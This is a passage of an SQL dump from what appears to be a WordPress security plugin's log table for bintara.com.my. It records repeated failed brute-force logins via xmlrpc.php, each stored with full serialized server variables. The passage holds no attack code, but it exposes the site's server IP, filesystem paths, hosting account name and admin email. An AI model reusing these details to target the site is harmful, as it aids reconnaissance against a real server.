Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCLRTEVi0fEJEHuDZXoQAAAAE\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.197.154\";s:11:\"REMOTE_PORT\";s:5:\"24322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCLRTEVi0fEJEHuDZXoQAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851629.6238\";s:12:\"REQUEST_TIME\";s:10:\"1566851629\";}}','notice','2019-08-26 20:33:51','2019-08-26 20:33:50',18299672,19500184,'http://bintara.com.my/cms/xmlrpc.php',1,0,'50.63.197.154'),(23249,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCLRTEVi0fEJEHuDZXoAAAAA4\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.177.211\";s:11:\"REMOTE_PORT\";s:5:\"28032\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCLRTEVi0fEJEHuDZXoAAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851629.2033\";s:12:\"REQUEST_TIME\";s:10:\"1566851629\";}}','notice','2019-08-26 20:33:51','2019-08-26 20:33:49',18298920,19499624,'http://bintara.com.my/cms/xmlrpc.php',1,0,'50.62.177.211'),(23248,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCLGXkG1atThADMYGPPAAAAM0\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:10:\"37.9.169.7\";s:11:\"REMOTE_PORT\";s:5:\"47712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCLGXkG1atThADMYGPPAAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851628.8848\";s:12:\"REQUEST_TIME\";s:10:\"1566851628\";}}','notice','2019-08-26 20:33:51','2019-08-26 20:33:49',18301632,19504632,'http://bintara.com.my/cms/xmlrpc.php',1,0,'37.9.169.7'),(23247,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dev/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCKRTEVi0fEJEHuDZXnQAAAAM\";s:12:\"REDIRECT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"184.168.193.13\";s:11:\"REMOTE_PORT\";s:5:\"20491\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCKRTEVi0fEJEHuDZXnQAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851625.1735\";s:12:\"REQUEST_TIME\";s:10:\"1566851625\";}}','notice','2019-08-26 20:33:48','2019-08-26 20:33:45',18298648,19501528,'http://bintara.com.my/dev/xmlrpc.php',1,0,'184.168.193.13'),(23246,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dev/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCKBTEVi0fEJEHuDZXmwAAABU\";s:12:\"REDIRECT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.40.177\";s:11:\"REMOTE_PORT\";s:5:\"47942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCKBTEVi0fEJEHuDZXmwAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851624.3534\";s:12:\"REQUEST_TIME\";s:10:\"1566851624\";}}','notice','2019-08-26 20:33:47','2019-08-26 20:33:44',18298760,19499624,'http://bintara.com.my/dev/xmlrpc.php',1,0,'148.72.40.177'),(23244,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/demo/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/demo/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/demo/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCJIir4pgxiIHnHK4poAAAAdQ\";s:12:\"REDIRECT_URL\";s:16:\"/demo/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"174.141.231.74\";s:11:\"REMOTE_PORT\";s:5:\"38268\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/demo/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/demo/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCJIir4pgxiIHnHK4poAAAAdQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851620.2471\";s:12:\"REQUEST_TIME\";s:10:\"1566851620\";}}','notice','2019-08-26 20:33:43','2019-08-26 20:33:40',18298600,19501048,'http://bintara.com.my/demo/xmlrpc.php',1,0,'174.141.231.74'),(23245,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCJxTEVi0fEJEHuDZXmQAAABc\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"91.215.216.54\";s:11:\"REMOTE_PORT\";s:5:\"59399\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCJxTEVi0fEJEHuDZXmQAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851623.9816\";s:12:\"REQUEST_TIME\";s:10:\"1566851623\";}}','notice','2019-08-26 20:33:47','2019-08-26 20:33:44',18296984,19500576,'http://bintara.com.my/new/xmlrpc.php',1,0,'91.215.216.54'),(23010,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"255\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.108.87.179\";s:11:\"REMOTE_PORT\";s:5:\"55540\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWKr6FuAVA@sVQxOtXwHbQAAARg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566747625.185\";s:12:\"REQUEST_TIME\";s:10:\"1566747625\";}}','notice','2019-08-25 15:40:28','2019-08-25 15:40:25',18298488,19489688,'http://bintara.com.my/xmlrpc.php',1,0,'89.108.87.179'),(23011,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-25 18:36:34','2019-08-25 18:36:31',17729592,18192080,'https://bintara.com.my/robots.txt',1,0,'157.55.39.20'),(23012,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 